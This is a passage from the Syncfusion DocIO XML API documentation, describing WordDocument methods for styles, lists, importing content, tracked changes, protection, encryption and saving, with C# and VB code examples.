            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                
                //Create user defined style
                IWParagraphStyle style = document.AddParagraphStyle("User_defined_style");
                style.ParagraphFormat.BackColor = Color.LightGray;
                style.ParagraphFormat.AfterSpacing = 18f;
                style.ParagraphFormat.BeforeSpacing = 18f;
                style.ParagraphFormat.Borders.BorderType = Syncfusion.DocIO.DLS.BorderStyle.DotDash;
                style.ParagraphFormat.Borders.LineWidth = 0.5f;
                style.ParagraphFormat.LineSpacing = 15f;
                style.CharacterFormat.FontName = "Calibri";
                style.CharacterFormat.Italic = true;
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                IWTextRange text = paragraph.AppendText("A new paragraph style is created and is applied to this paragraph.");
                //Apply the new style to paragraph
                paragraph.ApplyStyle("User_defined_style");
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Create user defined style
                Dim style As IWParagraphStyle = document.AddParagraphStyle("User_defined_style")
                style.ParagraphFormat.BackColor = Color.LightGray
                style.ParagraphFormat.AfterSpacing = 18.0F
                style.ParagraphFormat.BeforeSpacing = 18.0F
                style.ParagraphFormat.Borders.BorderType = Syncfusion.DocIO.DLS.BorderStyle.DotDash
                style.ParagraphFormat.Borders.LineWidth = 0.5F
                style.ParagraphFormat.LineSpacing = 15.0F
                style.CharacterFormat.FontName = "Calibri"
                style.CharacterFormat.Italic = True
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                Dim text As IWTextRange = paragraph.AppendText("A new paragraph style is created and is applied to this paragraph.")
                'Apply the new style to paragraph
                paragraph.ApplyStyle("User_defined_style")
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.IWParagraphStyle"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.WParagraphStyle"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.StyleType"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.WParagraph"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.AddCharacterStyle(System.String)">
            <summary>
            Adds new character style to document.
            </summary>
            <param name="styleName">A String that contains the name of the newly created <see cref="T:Syncfusion.DocIO.DLS.WCharacterStyle"/></param>       
            <returns>The newly created <see cref="T:Syncfusion.DocIO.DLS.IWCharacterStyle"/></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.AddListStyle(Syncfusion.DocIO.DLS.ListType,System.String)">
            <summary>
            Adds new list style to document.
            </summary>
            <param name="listType">The <see cref="T:Syncfusion.DocIO.DLS.ListType"/> of the new <see cref="T:Syncfusion.DocIO.DLS.ListStyle"/> created.</param>
            <param name="styleName">A String that contains the name of the newly added list style.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.ListStyle"/> this method creates.</returns>
            <example>
            <para>The following code example demonstrates how to how to create user defined list styles.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection(); 
                //Add new list style to the document          
                ListStyle listStyle = document.AddListStyle(ListType.Numbered, "UserdefinedList");
                WListLevel levelOne = listStyle.Levels[0];
                //Define the follow character, prefix, suffix, start index for level 0
                levelOne.FollowCharacter = FollowCharacterType.Tab;
                levelOne.NumberPrefix = "(";
                levelOne.NumberSufix = ")";
                levelOne.PatternType = ListPatternType.LowRoman;
                levelOne.StartAt = 1;
                levelOne.TabSpaceAfter = 5;
                levelOne.NumberAlignment = ListNumberAlignment.Center;
                WListLevel levelTwo = listStyle.Levels[1];
                //Define the follow character, suffix, pattern, start index for level 1
                levelTwo.FollowCharacter = FollowCharacterType.Tab;
                levelTwo.NumberSufix = "}";
                levelTwo.PatternType = ListPatternType.LowLetter;
                levelTwo.StartAt = 2; 
                
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();  
                //Add text to the paragraph
                paragraph.AppendText("User defined list - Level 0");
                //Apply default numbered list style
                paragraph.ListFormat.ApplyStyle("UserdefinedList");
                //Add second paragraph
                paragraph = section.AddParagraph();
                paragraph.AppendText("User defined list - Level 1");
                //Continue last defined list
                paragraph.ListFormat.ContinueListNumbering();
                //Increase the level indent
                paragraph.ListFormat.IncreaseIndentLevel();
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new list style to the document          
                Dim listStyle As ListStyle = document.AddListStyle(ListType.Numbered, "UserdefinedList")
                Dim levelOne As WListLevel = listStyle.Levels(0)
                'Define the follow character, prefix, suffix, start index for level 0
                levelOne.FollowCharacter = FollowCharacterType.Tab
                levelOne.NumberPrefix = "("
                levelOne.NumberSufix = ")"
                levelOne.PatternType = ListPatternType.LowRoman
                levelOne.StartAt = 1
                levelOne.TabSpaceAfter = 5
                levelOne.NumberAlignment = ListNumberAlignment.Center
                Dim levelTwo As WListLevel = listStyle.Levels(1)
                'Define the follow character, suffix, pattern, start index for level 1
                levelTwo.FollowCharacter = FollowCharacterType.Tab
                levelTwo.NumberSufix = "}"
                levelTwo.PatternType = ListPatternType.LowLetter
                levelTwo.StartAt = 2
                
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Add text to the paragraph
                paragraph.AppendText("User defined list - Level 0")
                'Apply default numbered list style
                paragraph.ListFormat.ApplyStyle("UserdefinedList")
                'Add second paragraph
                paragraph = section.AddParagraph()
                paragraph.AppendText("User defined list - Level 1")
                'Continue last defined list
                paragraph.ListFormat.ContinueListNumbering()
                'Increase the level indent
                paragraph.ListFormat.IncreaseIndentLevel()
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.ListStyle"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.ListType"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.WListLevel"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.WParagraph"/>
            <seealso cref="P:Syncfusion.DocIO.DLS.WParagraph.ListFormat"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.GetText">
            <summary>
            Returns a string that contains whole document content as text.
            </summary>
            <returns>The text this document contains.</returns>
            <remarks>This method is not supported in Silverlight, Windows Phone and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to retrieve the Word document contents as a plain text.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template document
                WordDocument document = new WordDocument("Template.docx");
                //Get the document text
                string text = document.GetText();
                //Create new Word document
                WordDocument newdocument = new WordDocument();
                //Add new section
                IWSection section = newdocument.AddSection();
                //Add new paragraph
                IWParagraph paragraph = section.AddParagraph();
                //Append the text to the paragraph
                paragraph.AppendText(text);
                //Save and close the document
                newdocument.Save("Sample.docx");
                newdocument.Close();
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template document
                Dim document As New WordDocument("Template.docx")
                'Get the document text
                Dim text As String = document.GetText()
                'Create new Word document
                Dim newdocument As New WordDocument()
                'Add new section
                Dim section As IWSection = newdocument.AddSection()
                'Add new paragraph
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Append the text to the paragraph
                paragraph.AppendText(text)
                'Save and close the document
                newdocument.Save("Sample.docx")
                newdocument.Close()
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Clone">
            <summary>
            Creates the duplicate copy of this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.
            </summary>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> this method duplicated.</returns>
            <example>
            <para>The following code example demonstrates how to clone the Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Open an existing document 
                WordDocument inputTemplateDoc = new WordDocument(fileName);
                //Create a clone of Input Template 
                WordDocument clonedDocument = inputTemplateDoc.Clone();
                //Save and Close the cloned document instance
                clonedDocument.Save("ClonedDocument.docx");
                clonedDocument.Close();
                //Close the input template document instance
                sourceDocument.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Open an existing document 
                Dim inputTemplateDoc As New WordDocument(fileName)
                'Create a clone of Input Template 
                Dim clonedDocument As WordDocument = inputTemplateDoc.Clone()
                'Save and Close the cloned document instance
                clonedDocument.Save("ClonedDocument.docx")
                clonedDocument.Close()
                'Close the input template document instance
                sourceDocument.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.ImportSection(Syncfusion.DocIO.DLS.IWSection)">
            <summary>
            Imports the specified section into the current document.
            </summary>
            <param name="section">The source <see cref="T:Syncfusion.DocIO.DLS.IWSection"/> whose contents are appended at the end of the current <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.</param>
            <example>
            <para>The following code example demonstrates how to import the section into the Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Open the source document 
                WordDocument sourceDocument = new WordDocument(sourceFileName);
                //Open the destination document 
                WordDocument destinationDocument = new WordDocument(targetFileName);
                //Import the last section of source document at the end of destination document
                destinationDocument.ImportSection(sourceDocument.LastSection);
                //Save the destination document
                destinationDocument.Save(outputFileName, FormatType.Docx);
                //close the document instances
                sourceDocument.Close();
                destinationDocument.Close();   
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Open the source document 
                Dim sourceDocument As New WordDocument(sourceFileName)
                'Open the destination document 
                Dim destinationDocument As New WordDocument(targetFileName)
                'Import the last section of source document at the end of destination document
                destinationDocument.ImportSection(sourceDocument.LastSection)
                'Save the destination document
                destinationDocument.Save(outputFileName, FormatType.Docx)
                'close the document instances
                sourceDocument.Close()
                destinationDocument.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.ImportContent(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Import contents and styles from the source document to the destination document.
            </summary>
            <param name="doc">The source <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> whose contents are appended at the end of the current <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.</param>
            <remarks>When source and destination documents have styles with the same names, then Guid is added as a suffix to the name of the imported styles in the destination document. Due to the above duplication of the same style will increase the file size of the document and also it may lead to Out of memory exception if the machine has some limited amount memory.
            <para>To resolve the duplication of the same style from source to destination document, use <c>ImportContent(IWordDocument doc, bool importStyles)</c> methods with false value for "importStyle" parameter.</para></remarks>
            <example>
            <para>The following code example demonstrates how to import the contents from source document into destination document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Open the source document 
                WordDocument sourceDocument = new WordDocument(sourceFileName);
                //Open the destination document 
                WordDocument destinationDocument = new WordDocument(targetFileName);
                //Import the contents of source document at the end of destination document
                destinationDocument.ImportContent(sourceDocument);
                //Save the destination document
                destinationDocument.Save(outputFileName, FormatType.Docx);
                //close the document instances
                sourceDocument.Close();
                destinationDocument.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Open the source document 
                Dim sourceDocument As New WordDocument(sourceFileName)
                'Open the destination document 
                Dim destinationDocument As New WordDocument(targetFileName)
                'Import the contents of source document at the end of destination document
                destinationDocument.ImportContent(sourceDocument)
                'Save the destination document
                destinationDocument.Save(outputFileName, FormatType.Docx)
                'close the document instances
                sourceDocument.Close()
                destinationDocument.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.ImportContent(Syncfusion.DocIO.DLS.IWordDocument,Syncfusion.DocIO.DLS.ImportOptions)">
            <summary>
            Import contents from the source document to the destination document with various import options.
            </summary>
            <param name="doc">The source <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> whose contents are appended at the end of the current <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.</param>
            <param name="importOptions">The <see cref="T:Syncfusion.DocIO.DLS.ImportOptions"/> that represents the options to import the source document contents to the destination document.</param>
            <remarks>
            <para> <b>Essential DocIO</b> supports the importing contents from the source document to the destination document with various import options similar to Microsoft Word copy and paste options. Following are the import options supported by Essential DocIO.</para>
            <list type="bullet">
            <item><b>KeepSourceFormatting</b>�Imports the contents from the source document, applies the default style (Normal), and preserves all other formatting as direct formatting in order to preserve the contents as in source document. Header and footer contents will be imported similar to the <b>UseDestinationStyles</b> option.</item>
            <item><b>MergeFormatting</b>�Imports the contents of the source document to the destination document, and applies the formatting of surrounding content to the destination document. Merges formatting of the contents surrounding it by preserving some of the source formatting (such as bold, italic, underline, and so on). Header and footer contents are imported similar to the <b>UseDestinationStyles</b> option.</item>
            <item><b>KeepTextOnly</b>�Imports only the text from the source document to the destination document (tables, textboxes, pictures, headers, footers, and so on, are removed), similar to content copied from a text file (.txt).</item>
            <item><b>UseDestinationStyles</b>�Imports the contents of the source document to the destination document, and applies the styles present in the destination document, or imports the source style to the destination document when there is no style with the same name in the destination document.</item>
            </list>
            </remarks>
            <example>
            <para>The following code example demonstrates how to import the contents from source document into destination document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Open the source document 
                WordDocument sourceDocument = new WordDocument(sourceFileName);
                //Open the destination document 
                WordDocument destinationDocument = new WordDocument(targetFileName);
                //Import the contents of source document at the end of destination document
                destinationDocument.ImportContent(sourceDocument, ImportOptions.UseDestinationStyles);
                //Save the destination document
                destinationDocument.Save(outputFileName, FormatType.Docx);
                //close the document instances
                sourceDocument.Close();
                destinationDocument.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Open the source document 
                Dim sourceDocument As New WordDocument(sourceFileName)
                'Open the destination document 
                Dim destinationDocument As New WordDocument(targetFileName)
                'Import the contents of source document at the end of destination document
                destinationDocument.ImportContent(sourceDocument, ImportOptions.UseDestinationStyles)
                'Save the destination document
                destinationDocument.Save(outputFileName, FormatType.Docx)
                'close the document instances
                sourceDocument.Close()
                destinationDocument.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.ImportDocumentText(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Imports the document text.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.ImportContent(Syncfusion.DocIO.DLS.IWordDocument,System.Boolean)">
            <summary>
            Import contents from the source document to the destination document by specifying whether to import styles that have the same name between the source and destination document.
            </summary>
            <param name="doc">The source <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> whose contents are appended at the end of the current <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.</param>
            <param name="importStyles">Set to <b>true</b> to import all the styles from the source document to destination document; otherwise, <b>false</b>.</param>
            <remarks>
            <para> When importStyles is set to false, all the contents are imported; but, the styles of the source document with style names that do not match with the styles in the destination document are not imported. When the style names match the destination style names, then the same name is applied to the imported contents. This behavior is similar to the Microsoft Word paste option � UseDestinationStyles.</para>
            <para> When importStyles is set to true, all the contents and styles of the source document are imported to the destination document. In cases where a style in the source document has the same name as a style in the destination document, �Guid� is added as a suffix to the name of the imported style in order to preserve unique style name.  Due to the above duplication of the same style will increase the file size of the document and also it may lead to Out of memory exception if the machine has some limited amount memory.</para>
            </remarks>
            <example>
            <para>The following code example demonstrates how to import the contents from source document into destination document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Open the source document 
                WordDocument sourceDocument = new WordDocument(sourceFileName);
                //Open the destination document 
                WordDocument destinationDocument = new WordDocument(targetFileName);
                //Import the contents of source document at the end of destination document
                destinationDocument.ImportContent(sourceDocument, true);
                //Save the destination document
                destinationDocument.Save(outputFileName, FormatType.Docx);
                //close the document instances
                sourceDocument.Close();
                destinationDocument.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Open the source document 
                Dim sourceDocument As New WordDocument(sourceFileName)
                'Open the destination document 
                Dim destinationDocument As New WordDocument(targetFileName)
                'Import the contents of source document at the end of destination document
                destinationDocument.ImportContent(sourceDocument, true)
                'Save the destination document
                destinationDocument.Save(outputFileName, FormatType.Docx)
                'close the document instances
                sourceDocument.Close()
                destinationDocument.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.AddStyle(Syncfusion.DocIO.DLS.BuiltinStyle)">
            <summary>
            Adds the built-in style to the <see cref="T:Syncfusion.DocIO.DLS.IStyleCollection"/> collection.
            </summary>
            <param name="builtinStyle">The <see cref="T:Syncfusion.DocIO.DLS.BuiltinStyle"/> that represents the added built-in style of the document.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IStyle"/> this method added to <see cref="T:Syncfusion.DocIO.DLS.IStyleCollection"/> collection.</returns>
            <example>
            <para>The following code example demonstrates how to add the built-in style to the document</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Add the built-in style to the document style collection
                IStyle style = document.AddStyle(BuiltinStyle.Heading5);
                //Apply the added built-in style to the last paragraph of the document
                document.LastParagraph.ApplyStyle(style.Name);
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Template.docx")
                'Add the built-in style to the document style collection
                Dim style As IStyle = document.AddStyle(BuiltinStyle.Heading5)
                'Apply the added built-in style to the last paragraph of the document
                document.LastParagraph.ApplyStyle(style.Name)
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.AcceptChanges">
            <summary>
            Accepts changes tracked from the moment of last change acceptance.
            </summary>
            <example>
            <para>The following code example demonstrates how to accept the tracked changes in the document</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Check whether document has tracked changes
                if (document.HasChanges)
                    //Accept the changes made to the document
                    document.AcceptChanges();
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Template.docx")
                'Check whether document has tracked changes
                If document.HasChanges Then
                	'Accept the changes made to the document
                	document.AcceptChanges()
                End If
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.RejectChanges">
            <summary>
            Rejects changes tracked from the moment of last change acceptance.
            </summary>
            <example>
            <para>The following code example demonstrates how to reject the tracked changes in the document</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Check whether document has tracked changes
                if (document.HasChanges)
                    //Reject the changes made to the document
                    document.RejectChanges();
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Template.docx")
                'Check whether document has tracked changes
                If document.HasChanges Then
                	'Reject the changes made to the document
                	document.RejectChanges()
                End If
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Protect(Syncfusion.DocIO.ProtectionType)">
            <summary>
            Protects the document from unintentional editing.
            </summary>
            <param name="type">The type of protection to be applied.</param>
            <example>
            <para>The following code example demonstrates how to protect the document from unintentional editing.</para>
            <remarks>This method is not supported in MVC6 and Xamarin platforms.</remarks>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Apply the protection to the document
                document.Protect(ProtectionType.AllowOnlyComments);
                //Save and close the document instances
                document.Save("Sample.docx");
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Template.docx")
                'Apply the protection to the document
                document.Protect(ProtectionType.AllowOnlyComments)
                'Save and close the document instances
                document.Save("Sample.docx")
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Protect(Syncfusion.DocIO.ProtectionType,System.String)">
            <summary>
            Protects the document from unintentional editing with secure password.
            </summary>
            <param name="type">The type of protection to be applied.</param>
            <param name="password">The password used for protection.</param>
            <remarks>This method is not supported in MVC6 and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to protect the document from unintentional editing.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx", "password");
                //Apply the protection to the document
                document.Protect(ProtectionType.AllowOnlyComments);
                //Save and close the document instances
                document.Save("Sample.docx");
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Template.docx")
                'Apply the protection to the document
                document.Protect(ProtectionType.AllowOnlyComments, "password")
                'Save and close the document instances
                document.Save("Sample.docx")
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.EncryptDocument(System.String)">
            <summary>
            Protects the document with password from unauthorized access.
            </summary>
            <param name="password">A String used to encrypt the document.</param>
            <remarks>This method is not supported in MVC6 and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to encrypt the Word document with password.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Open an input Word document
                WordDocument document = new WordDocument(�Template.docx�);
                //Encrypt the Word document with a password
                document.EncryptDocument("password");
                //Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Open an input Word document
                Dim document As New WordDocument("Template.docx")
                'Encrypt the Word document with a password
                document.EncryptDocument("password")
                'Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.RemoveEncryption">
            <summary>
            Removes the encryption from the document.
            </summary>
            <remarks>This method is not supported in MVC6 and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to remove encrypt from the Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Open an input Word document
                WordDocument document = new WordDocument(�Template.docx�);
                //Remove the encryption from document
                document.RemoveEncryption();
                //Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Open an input Word document
                Dim document As New WordDocument("Template.docx")
                'Remove the encryption from document
                document.RemoveEncryption();
                'Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.AddStyle(Syncfusion.DocIO.DLS.StyleType,System.String)">
            <summary>
            Adds new style to document.
            </summary>
            <param name="styleType">Style type</param>
            <param name="styleName">Style name</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CheckNormalStyle">
            <summary>
            Checks the normal style.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.GetCrossReferenceItems(Syncfusion.DocIO.ReferenceType)">
            <summary>
            Gets the list/array of items that can be cross-referenced based on the specified reference type.
            </summary>
            <param name="refernceType">
            Specifies the type of item you want to insert a cross-reference to.
            </param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.Entity"/> collection that represents the cross reference items in the document.</returns>
            <remarks>
            <para>
            This method returns the cross reference of Bookmarks items only.
            </para>
            <para>
            For bookmarks, it returns the entity collections of BookmarkStart only if the bookmark contains proper start and end.
            </para>
            </remarks>
            <example>
            <para>The following code example demonstrates how to append cross reference for bookmark in Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Get the collection of bookmark start in the word document
                List&lt; Entity &gt; items = document.GetCrossReferenceItems(ReferenceType.Bookmark);
                if (items.Count &gt; 0)
                    //Change the first cross reference items owner paragraph back color as YelloGreen
                    (items[0] as BookmarkStart).OwnerParagraph.ParagraphFormat.BackColor = Color.YellowGreen;
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Template.docx")
                'Get the collection of bookmark start in the word document
                Dim items As List(Of Entity) = document.GetCrossReferenceItems(ReferenceType.Bookmark)
                If items.Count &gt; 0 Then
                	'Change the first cross reference items owner paragraph back color as YelloGreen
                	TryCast(items(0), BookmarkStart).OwnerParagraph.ParagraphFormat.BackColor = Color.YellowGreen
                End If
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.GetBookmarks">
            <summary>
            Gets the bookmarks.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.OpenDocx(System.IO.Stream)">
            <summary>
            Opens the Word Docx document
            </summary>
            <param name="stream">The stream contains the document content</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.OpenWordML(System.String)">
            <summary>
            Opens the Word XML document
            </summary>
            <param name="fileName">Name of the file</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.OpenWordML(System.IO.Stream)">
            <summary>
            Opens the Word XML document
            </summary>
            <param name="stream">The stream contains the document content</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.OpenXml(System.String)">
            <summary>
            Opens the document from XML format file.
            </summary>
            <param name="fileName">The name of file</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.OpenXml(System.IO.Stream)">
            <summary>
            Opens the XML document from stream.
            </summary>
            <param name="stream">The stream object</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.ValidationCallBack(System.Object,System.Xml.Schema.ValidationEventArgs)">
            <summary>
            Display any warnings or errors.
            </summary>
            <param name="sender"></param>
            <param name="args"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.SaveXml(System.String)">
            <summary>
            Saves the document in XML format.
            </summary>
            <param name="fileName">The name of target file</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.SaveXml(System.IO.Stream)">
            <summary>
            Saves the document in XML format.
            </summary>
            <param name="stream">The target stream</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.SaveTxt(System.String)">
            <summary>
            Saves the document in text format.
            </summary>
            <param name="fileName">The name of target file</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.SaveTxt(System.String,System.Text.Encoding)">
            <summary>
            Saves this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>as text file(.txt) with specified encoding.
            </summary>
            <param name="fileName">A string that contains the name of the file to save.</param>
            <param name="encoding">The character encoding to use.</param>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, UNiversal Windows Platform and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to convert the Word document into text file.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                //Save the document as Text file
                document.SaveTxt("sample.txt", Encoding.ASCII);
                //Close the document
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                'Save the document as Text file
                document.SaveTxt("sample.txt", Encoding.ASCII)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.SaveEPub(System.String,Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Saves the document in EPub format.
            </summary>
            <param name="fileName"></param>
        </member>
